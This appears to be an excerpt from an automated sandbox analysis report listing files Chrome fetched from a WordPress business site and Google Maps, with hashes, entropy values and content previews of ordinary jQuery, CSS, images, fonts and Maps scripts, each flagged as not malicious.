                                                                                                                      Preview:/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):186515
                                                                                                                      Entropy (8bit):4.930256219580378
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:pmluyhEPIXfP8ZhBWlPpXnTRRXXWrq1rqndsCuCaUAg9ugboxrk:k59nXWrq1rqndsCVAg9ur6
                                                                                                                      MD5:CFB01AC656E5D2429DFFE9BC5A3FBAE6
                                                                                                                      SHA1:B3A3B29A6F511AEE66662F89B663E7C46D7DAB92
                                                                                                                      SHA-256:7FCA50AFAF18FC3C414C0D5823E96A8097A436C945B2706AF8FEFFE0D06F0170
                                                                                                                      SHA-512:7AEA3853991E76BA7607D7B46CDCF94CDC892B782A84614217042E21F6F2B1AC539D99F37FF0BB3D1741E0FD41B0ECC5045107D2C3414CDF8249E6E62C1BF710
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/salient-dynamic-styles.css?ver=53858
                                                                                                                      Preview:.nectar-color-accent-color,body a,label span,body [class^="icon-"].icon-default-style,.blog-recent[data-style*="classic_enhanced"] .post-meta a:hover i,.masonry.classic_enhanced .post .post-meta a:hover i,.post .post-header h2 a,.post .post-header a:hover,.post .post-header a:focus,#single-below-header a:hover,#single-below-header a:focus,.comment-list .pingback .comment-body > a:hover,[data-style="list_featured_first_row"] .meta-category a,[data-style="list_featured_first_row"] .meta-category a,.nectar-fancy-box[data-style="color_box_hover"][data-color="accent-color"] .icon-default-style,div[data-style="minimal"] .toggle:hover > .toggle-title a,div[data-style="minimal"] .toggle.open > .toggle-title a,#footer-outer #copyright li a i:hover,.ascend .comment-list .reply a,body.material .widget:not(.nectar_popular_posts_widget):not(.recent_posts_extra_widget) li a:hover,body.material #sidebar .widget:not(.nectar_popular_posts_widget):not(.recent_posts_extra_widget) li a:hover,body.material
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):8574
                                                                                                                      Entropy (8bit):7.578950072742075
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:7Ptaj4/xyIyu66FmIvaVrFuWBZxtRvk/wsh:7M0/xyTmRUbZHVk5h
                                                                                                                      MD5:345489913CAC925AD0512BEF28246AA0
                                                                                                                      SHA1:9717051206BA4A3168918EF4D50EF93C9BA519F1
                                                                                                                      SHA-256:871EC5A0BCAD2CB8B01FC8F7AF80C5CC7ED55994A16E771EC3DF9FBAD9EF542A
                                                                                                                      SHA-512:FB5381073E14A7C5DDE5267027ED1FFA048AB5950682201136923386F192A68272DB45386EBDEF2FD0F70D3EF5B517D3E5D386694BFA501311C910609068E714
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/cape-nature.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................:...B......!|............................................................................................................................................J.J.........................................................................................P!1.. 02.@."3.`B#45$.......................!1..AQq."Pa...2Rb.. 0.Br#3.@....`..C$.................. .!.P.@`.a0..."....................!1A.QaqP.... 0.@.`..................@...................................................................................................................................................................................................@...TtP.g...).............[......,=................q.).<.p.e.j|...4.A2.H............ML..."...>8.G.u{........................8.5<...7Yvi<.^u.y.[.zV?CeF..............x....F.u}WAm..^...Wx............._.....N..^................f.........{...H.........................................(...*.K.......e..uT.............=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 322x227, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):7219
                                                                                                                      Entropy (8bit):7.6467074785109395
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:S6Mo+uiYHqKD/F0RYyDPdzM9IWDFUhmGAYu:S66uiYKS/KYG2OWDGhU
                                                                                                                      MD5:20C87F780F669DC9D9101C8BD1DF0822
                                                                                                                      SHA1:6ABB8437BA502BE0FF131FD806DF64E2257E03DC
                                                                                                                      SHA-256:BFC2D1E18DABF8722144141A5A68EB646823A7CC90D92900303020692B7F3982
                                                                                                                      SHA-512:1F8EEACC53BF823348DF3BC563E3345C82C663EABAE4EFA365E24578AC74858F0794EA5FD407F29A948C6C6376940AEC04352F18FC908E1459CF606F0D84D420
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft-1.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d............................1..............................................................................................................................................B...................................................................................3.560@..2.4.P... 1"#$%&.......................!1...Aaq"Q...#s..2Bbr....0@.R.4P...3CS. ..$.......................................!1AQa.q.. 0@..P................................................................................................................................................>..r...l........N<..|......j.87...z9...~..r.g9.~O..8..1.|,.h.......*.p....r.B.d....r.c.....$+g.N....*&...p....*.,....l.!K=.,~MA.TM.Y..`{g.e.Q.(Dh.......*......-$....@u.A....I..1....$..r~S..i".....n..5.....jeJQ.0.p.s.:....ZS....M...&.......................dwO......................&}? .J. ......|.............c.z.x.....($.....#.4.l...<I......./G.q..f{....-$X....5.....7$<.......Z.7..<o..':.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 322 x 227, 8-bit/color RGB, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):109889
                                                                                                                      Entropy (8bit):7.995672839674691
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:tlPwiukratWx03SC/akdGGixaEM1+a2KB+BV4TwHQPG4p/DOe4lVsnLQ6pMsUUxR:tSiNp23JmGixaEDKhyuG4xssnLyLzMGs
                                                                                                                      MD5:26A05E099677D1A37C68E05C9DEC8879
                                                                                                                      SHA1:AD3EF7B8BAAE49C0E85B8220C2066F6042F0E32B
                                                                                                                      SHA-256:8370AB63F16BBDE51BD7B041D56F2E5FB8CF2FE75CB0D2F74483138171198165
                                                                                                                      SHA-512:ACC47FD7A05ADE8C5649BA836FD94914398383199C9FE0687F42598F653BAE31FB1F0E563F980BCB41A8EF8938896AB9ACE2FBCFF107F86F992FF8C04745CC3C
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...B............4....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.|.I.eIz.....*.......n...QlJ.(..A..-hc.7..^xg...6..{g....-.\.D..e."e.m..fw..k....rx........8qn&..*...=.......~..?Q.i)...9a..8g...uBH..RB.'.K........~.?......{.o.~|....p"~C...h.q.FC...0......wd...^V.-..U..yY..*.(......Li...W...p.n...py..v...,...L....j..w.....-.3*.....U...._.D.....=.m..1...m.M.....\.....-....Q.3.Zj.DX.|._H|..t.>..?I...|.^y^{I/.+..H.~.. .GX.#)...a..Eg.`..7A.!h_5....>.i.?..4o>..m-~......:.).v~..u.}..n..`.ra.f..n..5p.....\.mg...-...v;...T..C?.]..Q..Uj...Go.._..;....O..jZ..........[.W.M.>h........M.._:]<..V.....d.>.....?pN..FU...../.wK.....k.......'p.....{.I......p..t]..*......$l.....pJ;..~.HOO.?.9.KQbE".......O..%..&/....$..@@$....8.#..H?.I7....<..^.....@. /H.K.gt.x..A..F.......B..'.mv.....N!..c.\F.n.......IX.<...1..NdR.J.....GV, ..*..'S. I...S.C.o..I".p...,.)^h.......o.....7>-p..........5.g.4.@....N3.:......].vR...)..WW....Tok7.7W..j...-s...L....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (21205), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):21205
                                                                                                                      Entropy (8bit):5.249788317174228
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:gHTLkCoiKXCBQYMwoTR+YbeAkCGMBgXdgnL/7bQJ6dHMQs++C551aPu5:g3eIMp3hGEgdgnLIJcHU++CZou5
                                                                                                                      MD5:8D0B3B2F86E0025489B660454AC76419
                                                                                                                      SHA1:9F7E9AC535F3E75ACE0015339499E286837623DD
                                                                                                                      SHA-256:FD0062DADC441AC836028282DFDA635DA47F4280756D07AB0908FAF71818E05E
                                                                                                                      SHA-512:208366D97E4146CED14923E4455CDAC9A2D862A068D850A4CB8FB7E5A06061BEA03B60005601350693529F1263E49AF9D5B5ECD7BBBF0EC5ABCE2F108DF72405
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(require("jquery")):e(window.jQuery||window.Zepto)}(function(e){var t,n,i,o,a,r,s=function(){},l=!!window.jQuery,c=e(window),p=function(e,n){t.ev.on("mfp"+e+".mfp",n)},d=function(t,n,i,o){var a=document.createElement("div");return a.className="mfp-"+t,i&&(a.innerHTML=i),o?n&&n.appendChild(a):(a=e(a),n&&a.appendTo(n)),a},u=function(n,i){t.ev.triggerHandler("mfp"+n,i),t.st.callbacks&&(n=n.charAt(0).toLowerCase()+n.slice(1),t.st.callbacks[n]&&t.st.callbacks[n].apply(t,e.isArray(i)?i:[i]))},f=function(n){return n===r&&t.currTemplate.closeBtn||(t.currTemplate.closeBtn=e(t.st.closeMarkup.replace("%title%",t.st.tClose)),r=n),t.currTemplate.closeBtn},m=function(){e.magnificPopup.instance||((t=new s).init(),e.magnificPopup.instance=t)};s.prototype={constructor:s,init:function(){var n=navigator.appVersion;t.isIE7=-1!==n.indexOf("MSIE 7."),t.isIE8=-1!==n.indexOf("MSIE 8."),t.isLowIE=t.isIE7||t.isIE8,
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2118), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2118
                                                                                                                      Entropy (8bit):4.906556197176688
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:JdFKUzeeH+hj95H+hzE+U8b6zuSG4x6typnqexsH+hjC65dyM/4E+Sa:JzypQujzuSm+nyet8
                                                                                                                      MD5:08A21CC728B9526C53A7CAAA88768181
                                                                                                                      SHA1:CDCC0F85545D7AF225E461DC53F719C6274379F7
                                                                                                                      SHA-256:2B0F86F21531146B16D4EB1501175EE92518DC7C32DE5932818984B4D0D3612D
                                                                                                                      SHA-512:47C7C8D2AE914DC40319C389C2D9D7A74F7E79B8CA15F667CF0F4137D4DCF066E100B2E607D8E896CB7516458884CD5304EE6D52CE2F5B3EE19298DA8D4D3E97
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-milestone.css?ver=15.0.6
                                                                                                                      Preview:.nectar-milestone{text-align:center;transition:opacity .15s ease}.nectar-milestone:not(.animated-in){opacity:0}.nectar-milestone[data-ms-align=right],.span_12.right .nectar-milestone{text-align:right}.nectar-milestone[data-ms-align=left]{text-align:left}.span_12.right .nectar-milestone[data-symbol-alignment=superscript]{padding-right:40px}body .nectar-milestone .number h1,body .nectar-milestone .number h2,body .nectar-milestone .number h3,body .nectar-milestone .number h4,body .nectar-milestone .number h5{font-size:inherit;line-height:inherit;color:inherit;display:inline-block}.nectar-milestone .number{font-size:62px;line-height:62px;font-family:'Open Sans';font-weight:600;margin-bottom:5px;position:relative;display:inline-block}.nectar-milestone.motion_blur .number span:not(.in-sight){transform:translateY(-100%);-webkit-transform:translateY(-100%);opacity:0}.nectar-milestone.motion_blur .number span{display:inline-block}body .nectar-milestone .subject{letter-spacing:.5px;font-size:16p
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):164953
                                                                                                                      Entropy (8bit):5.039926191780105
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:qb9FKmUXh9dWCBUXA/Mo+xDQsmPJfKnx7v1gm+m1NXs3J0oHL/Ui68G5TCecjlTo:LUQNIi8Ld
                                                                                                                      MD5:1CCADD5501D2C69E0F601F895C13677D
                                                                                                                      SHA1:FAD31E523F6455273D70F27886230D15727DD30E
                                                                                                                      SHA-256:54FA17171458C9EDC27C3490B05FCDE01B8EE63B31CA2E104166292655A0DAF6
                                                                                                                      SHA-512:BEE8EC0121F086F84A60BB3581F1493EAAA63AC786481601143DBAABD10AD150BA4183B140218CD380FD1E07F0A59A35FDE4ED0DECF283C25B6C291C3C2714B2
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/style.css?ver=15.0.6
                                                                                                                      Preview:a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}input[type=submit]{-webkit-appearance:none}html{max-width:100%;overflow-y:scroll;overflow-x:hidden}body{max-width:100%;overflow:hidden;background:#fff;font-family:'Open Sans',sans-serif;color:#676767;position:relative}ol,ul{list-style:none}input[type=text]::-ms-clear{display:none}sup{font-size:.5em;vertical-align:super}sub{font-size:.5em;vertical-align:sub}p:empty{display:none}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}*{-webkit-box-sizing:border-box;-moz-
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (51719)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):51880
                                                                                                                      Entropy (8bit):5.086248292508488
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:/kZlIbIM6YIMIgIzwO1CA5kiDb3CyQ5xrQe/0STbsysb:/kZiIzwO1CA5kiDb3CyQ5xrQe/0ST4
                                                                                                                      MD5:8B6DAE7F49F2B5FD72F43C405D4417B9
                                                                                                                      SHA1:A10AC4645869698687A5E08CD77E3D98232CA3D0
                                                                                                                      SHA-256:1C3FBF3F4938451BC3B7781F832B7DA84C23EEC5B979AC7541EC754E67E3B6D2
                                                                                                                      SHA-512:7A49D6FFCC94FBACDAB8AC8DA27CD5F211122974C49EB652172674BD27C625037869831A9639EDDC7D5D65B9D5D81D3C00FB4948AFE45B146B3CB5B7814818FB
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/lib/bower/animate-css/animate.min.css?ver=6.9.1
                                                                                                                      Preview:@charset "UTF-8";/*!.Animate.css - http://daneden.me/animate.Licensed under the MIT license - http://opensource.org/licenses/MIT..Copyright (c) 2014 Daniel Eden.*/.animated{-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.animated.infinite{-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}.animated.hinge{-webkit-animation-duration:2s;animation-duration:2s}@-webkit-keyframes bounce{0%,100%,20%,53%,80%{transition-timing-function:cubic-bezier(.215,.61,.355,1);-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}40%,43%{transition-timing-function:cubic-bezier(.755,.050,.855,.060);-webkit-transform:translate3d(0,-30px,0);transform:translate3d(0,-30px,0)}70%{transition-timing-function:cubic-bezier(.755,.050,.855,.060);-webkit-transform:translate3d(0,-15px,0);transform:translate3d(0,-15px,0)}90%{-webkit-transform:translate3d(0,-4px,0);transform:translate3d(0,-4px,0)}}@keyframes bounce{0%,100
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 18588, version 1.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):18588
                                                                                                                      Entropy (8bit):7.988601596032928
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:WF9srt3EJfKy7iOpqErJeqQhzsaZqPTPabcoqYdBTKYPvS9BlTf:Wn6UhKYieqAiPQTwclYQLlTf
                                                                                                                      MD5:115C2D84727B41DA5E9B4394887A8C40
                                                                                                                      SHA1:44F495A7F32620E51ACCA2E78F7E0615CB305781
                                                                                                                      SHA-256:AE0E442895406E9922237108496C2CD60F4947649A826463E2DA9860B5C25DD6
                                                                                                                      SHA-512:00402945111722B041F317B082B7103BCC470C2112D86847EAC44674053FC0642C5DF72015DCB57C65C4FFABB7B03ECE7E5F889190F09A45CEF1F3E35F830F45
                                                                                                                      Malicious:false
                                                                                                                      URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                      Preview:wOF2......H........ ..H8................................|.`..J.\..<........-..Z...x.6.$..0. .... ..S.7.5..K!.;..../.`..Sn.J.e.52P.(.....=9....f.....$...*.fZ.p...N...t....6.lfS.Ju.i.o.g..<....T"O.o..4..4....M/N.>.K..."[.P...W.u.>]................A.9z....IN^....z..Y.{....m=...+X9<?.......(IA*G8rD....52L0.p .EJ..p....=.......[U...pz..g...../L.U.......P..W.U..q$L..6......C.M.0..R..........D(.ilX.Y..SZ.R...Q..j.6.@\."|.l......3....,.T.....L...ap0......6.j.\&O.z`*.$.*_+vwnr...,....?W.T....!.J...L#%.......A}........\.....l...:....U..u.J.0....O......&.!.)4.V..:.}.0f....:W......?U.....%...b...!....yA.sw.....5..T .}{.t!F.G....{"..pQ.S.v.S....t......U.Y|.v.@....|..(..V.........^....../.7......K......J.Uq/L.T-.`.O........;........';vWq.+....J...J..p.....sB`(1LC.k....?Z{...v>dS....F..........\.....UetU........6.V...vE....._.../...%.q...^.l...>^.z..l..p....j..@H...`X.p...KQ. .<@...I...BF.......L..6...y.2=.P....8;..@`.m.....R.B.L.r.*T.T..l@.6.Y....}g.....F.n...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x300, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):17939
                                                                                                                      Entropy (8bit):7.638242154234509
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:T0f2ChY4q1N2nGRP+LnHJ5PBSzmAI6DKj1oUgob5lOk6CNoxkuiI4MdOz3KRiZFc:T0eOYHkjYz66GjLb1veku74M+KRJ+q
                                                                                                                      MD5:67EEC4D68246155BCE71D62A395F028C
                                                                                                                      SHA1:AF33DCD19BBBEAD2214F874CF55CBC694F08643A
                                                                                                                      SHA-256:C058708BD2F611B5CEFBF8DD7E307795FC200CB721466C0B00414B8A0925CC51
                                                                                                                      SHA-512:77C43DD81F982194F67220AA769829F5F43A9AE9DD7D367324A998E1A62360FE2D975D821C92B5185D1143216AD0AB2A8AFBA7B91643CDD20C17561241FAEAE4
                                                                                                                      Malicious:false
                                                                                                                      Preview:......Exif..II*.................Ducky.......d.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:9DBD99E6E1B511E8B98398EB3C68BCBE" xmpMM:DocumentID="xmp.did:9DBD99E7E1B511E8B98398EB3C68BCBE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9DBD99E4E1B511E8B98398EB3C68BCBE" stRef:documentID="xmp.did:9DBD99E5E1B511E8B98398EB3C68BCBE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3868)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):30442
                                                                                                                      Entropy (8bit):5.568766720965189
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Mj16CN2MKqPGIcGXNK2rRbvx2D/U1asID5uBmNF5zceQKuzwprWs7tkf/LK4+rhd:wl4RHNuBOQs2657
                                                                                                                      MD5:30B34261D5CBC4C93F0EF75E598DE78B
                                                                                                                      SHA1:9EA9C4615CE823A33482984F4CBF02E51815FC88
                                                                                                                      SHA-256:BB2471C16F60CD198D57E7CBC77103D3C5DBDDC3C36175F6568E3E9E6EEBD163
                                                                                                                      SHA-512:7679800DC9936D908EF957DA6100AE14F277E5F9322387E3D6873A8086DFD74E9306408206FBAE59BEB04E836439B8547E884823597F0A2B8FA4B4B7E2746B8E
                                                                                                                      Malicious:false
                                                                                                                      Preview:google.maps.__gjsload__('onion', function(_){var tYa,uYa,XP,$P,ZP,xYa,yYa,zYa,wYa,AYa,bQ,BYa,CYa,DYa,FYa,HYa,IYa,KYa,LYa,OYa,QYa,SYa,UYa,WYa,XYa,VYa,hQ,iQ,gQ,jQ,bZa,cZa,dZa,eZa,gZa,fZa,kQ,oZa,nZa,nQ,tZa,uZa,vZa,sZa,wZa,yZa,pQ,CZa,DZa,EZa,xZa,zZa,AZa,FZa,GZa,oQ,PZa,QZa,TZa,SZa;tYa=function(a,b){_.Xg(a.Gg,1,b)};uYa=function(a,b){_.Xg(a.Gg,2,b)};XP=function(){vYa||(vYa=[_.P,_.N,_.Q])};$P=function(a){_.yG.call(this,a,YP);ZP(a)};.ZP=function(a){_.QF(a,YP)||(_.PF(a,YP,{entity:0,jn:1},["div",,1,0,[" ",["div",,1,1,[" ",["div",576,1,2,"Dutch Cheese Cakes"]," "]]," ",["div",,1,3,[" ",["span",576,1,4,"Central Station"]," ",["div",,1,5]," "]]," "]],[],wYa()),_.QF(a,"t-ZGhYQtxECIs")||_.PF(a,"t-ZGhYQtxECIs",{},["jsl",,1,0," Station is accessible "],[],[["$t","t-ZGhYQtxECIs"]]))};xYa=function(a){return a.uj};yYa=function(a){return a.xl};zYa=function(){return _.oF("t-ZGhYQtxECIs",{})};.wYa=function(){return[["$t","t-t0weeym2tCw","$a",[7,,,,,"transit-container"]],["display",function(a){return!_.rF(a.en
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):5666
                                                                                                                      Entropy (8bit):7.169926753608612
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:SfosneG5nKZ405GMQyMs/8tHOH3iaDD/QQ0huv3jxIdSqFKIqHeK:SQYemh05nQ88k/DDoQ0hS+E0K9eK
                                                                                                                      MD5:F86B566370792EE3C742DC86FC4A4C6A
                                                                                                                      SHA1:FA026ABC15AE94D7DA41F9A10B88AE3FD1C7DD99
                                                                                                                      SHA-256:2801177A24F6AB2F719705F8EE4AD78A2B3278DE300EA2602A36B2E001E31B2A
                                                                                                                      SHA-512:D300233402AAFB183EE1A964324F0AA7FF527C66CA5509309EC2E3A771559861F8E4EE967BC6A30B430C779D0F96DF608C823E3ECB60F03F9E5FED460EB36818
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.................... ....... ............................................................................................................................................J.J.........................................................................................P.2...134. 05!.......................!1.AQaq."2r.3 0...B...P.Rs...#...................1.P..q......................!1Q..Aaq. P......0.@...................................................................................................................................................................................................................................................................................................D....}..t...............K....*.~=dq....x.6...=........c.'.....K....*.~=dq....x.iHW.&y^w....<.9.3..5.3..>~W.......zd.E..k.^.z..i...<...p...(P..l.2.3..(..`.<L...-.....Y.q@...;.:...#...|..1J.<.=.2..8.C.>vQ....k....>~}.........-~y....i.Tv....>|}....l.gQ.y
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (10643)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):274617
                                                                                                                      Entropy (8bit):5.408496759284294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:Un6e7IhYBtqhKCNgYCsGsRtBXCiPy8HmHEuYyrs2/6M/6VZA1a:Un6e7IhYBtqhKJY1XCiPy8GHEuYyrs2c
                                                                                                                      MD5:53F03F3BF5AC50ECFE0EA1E1E2ED79E6
                                                                                                                      SHA1:BD57A795674792A15CF3E53B5565E39C1B66E1D5
                                                                                                                      SHA-256:0061A2D076D7E51D46D0F48ECB18F343E53FBB63FC93B7851073FE1FE5C78BFD
                                                                                                                      SHA-512:EB471BDB13E6E927550D97D5E10CAD69A8A863048B0E4A98CE3CA3C4AE20FB5D97BF3FB9420209AE112D7AB4602C2EE10AA3B61F6D187704384EBE30D38D78EC
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/common.js
                                                                                                                      Preview:google.maps.__gjsload__('common', function(_){var Kia,Jia,Mia,Sia,Zia,$ia,cja,Cr,dja,Dr,eja,Er,fja,Fr,Ir,Kr,hja,ija,lja,mja,oja,us,qja,sja,tja,Fs,xja,jt,Fja,Hja,Gja,Lja,Mja,Pja,Qja,Rja,Ot,Ut,Wja,Vt,Yt,Xja,Zt,Yja,bu,dka,eka,ju,fka,gka,Xka,Yka,vla,zla,Ala,Bla,Cla,Dla,Lw,Hla,Mw,Ila,Jla,Lla,Nla,Mla,Pla,Ola,Kla,Qla,Sla,Ula,bma,fma,gma,pma,nma,gx,hx,rma,sma,tma,uma,wma,xma,Pw,Qw,Rla,Ow,jw,Pia,yma,Qia,Vla,Ria,Wia,Yia,Dma,Ema,Fma,Gma,Hma,ox,xv,Kma,Lma,Mma,uja,zs;.Kia=function(a){const b=[];let c=a.length;var d=a[c-1];let e;if(_.Pg(d)){c--;e={};var f=0;for(const g in d)d[g]!=null&&(e[g]=Jia(d[g],a,g),f++);f||(e=void 0)}for(d=0;d<c;d++)f=a[d],f!=null&&(b[d]=Jia(f,a,d+1));e&&b.push(e);return b};Jia=function(a,b,c){a instanceof _.dh&&(a=a.Jl(b,+c));return Array.isArray(a)?Kia(a):typeof a==="boolean"?a?1:0:typeof a==="number"?isNaN(a)||a===Infinity||a===-Infinity?String(a):a:a instanceof Uint8Array?_.gc(a):a instanceof _.ic?_.qc(a):a};_.Kq=function(a){return!!a.handled};._.Lia=function(a,b){functio
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3868)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):30442
                                                                                                                      Entropy (8bit):5.568766720965189
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Mj16CN2MKqPGIcGXNK2rRbvx2D/U1asID5uBmNF5zceQKuzwprWs7tkf/LK4+rhd:wl4RHNuBOQs2657
                                                                                                                      MD5:30B34261D5CBC4C93F0EF75E598DE78B
                                                                                                                      SHA1:9EA9C4615CE823A33482984F4CBF02E51815FC88
                                                                                                                      SHA-256:BB2471C16F60CD198D57E7CBC77103D3C5DBDDC3C36175F6568E3E9E6EEBD163
                                                                                                                      SHA-512:7679800DC9936D908EF957DA6100AE14F277E5F9322387E3D6873A8086DFD74E9306408206FBAE59BEB04E836439B8547E884823597F0A2B8FA4B4B7E2746B8E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/onion.js
